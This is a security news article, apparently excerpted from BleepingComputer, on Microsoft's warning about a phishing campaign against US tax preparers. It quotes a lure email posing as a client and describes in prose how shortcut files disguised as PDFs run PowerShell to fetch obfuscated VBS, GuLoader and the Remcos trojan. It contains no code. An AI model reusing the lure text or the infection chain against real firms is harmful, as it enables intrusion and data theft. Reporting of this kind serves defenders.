Microsoft is warning of a phishing campaign targeting accounting firms and tax preparers with remote access malware allowing initial access to corporate networks.
With the USA reaching the end of its annual tax season, accountants are scrambling to gather clients’ tax documents to complete and file their tax returns.
Due to this, it makes it an ideal time for threat actors to target tax preparers, hoping that they mistakenly open malicious files that they would generally be more careful with when less busy.
This is exactly what Microsoft sees in a new phishing scam targeting tax professionals to install the Remcos remote access trojan malware.
“With U.S. Tax Day approaching, Microsoft has observed phishing attacks targeting accounting and tax return preparation firms to deliver the Remcos remote access trojan (RAT) and compromise target networks beginning in February of this year,” Microsoft warns in a new report.
Targeting tax professionals
The phishing campaign starts with emails that pretend to be clients sending the necessary documents to complete their return.
“I apologize not responding sooner; our individual tax return should be simple and not require much of your time,” reads a phishing email seen by Microsoft.
“I believe you would require a copy of our most recent year’s documents, such as W-2s, 1099s, mortages, interest, donations, medical investments, HSAs, and so on which I have uploaded below.”
Source: Microsoft
These phishing emails contain links that utilize click-tracking services to evade detection by security software, and ultimately lead to a file hosting site that downloads a ZIP archive.
This ZIP archive contains numerous files pretending to be PDF files for various tax forms but are actually Windows shortcuts.
Source: Microsoft
When double-clicked, these Windows shortcuts will execute PowerShell to download a heavily obfuscated VBS file from a remote host, which is saved to C:WindowsTasks and executed.
At the same time, the VBS script will download a decoy PDF file and open it in Microsoft Edge to avoid arousing suspicion by the targeted person.
Microsoft says that these VBS files will download and execute the GuLoader malware, which in turn, installs the Remcos remote access trojan.
Source: Microsoft
Remcos is a remote access trojan that threat actors commonly use in phishing campaigns to…
Click Here to Read the Full Original Article at BleepingComputer…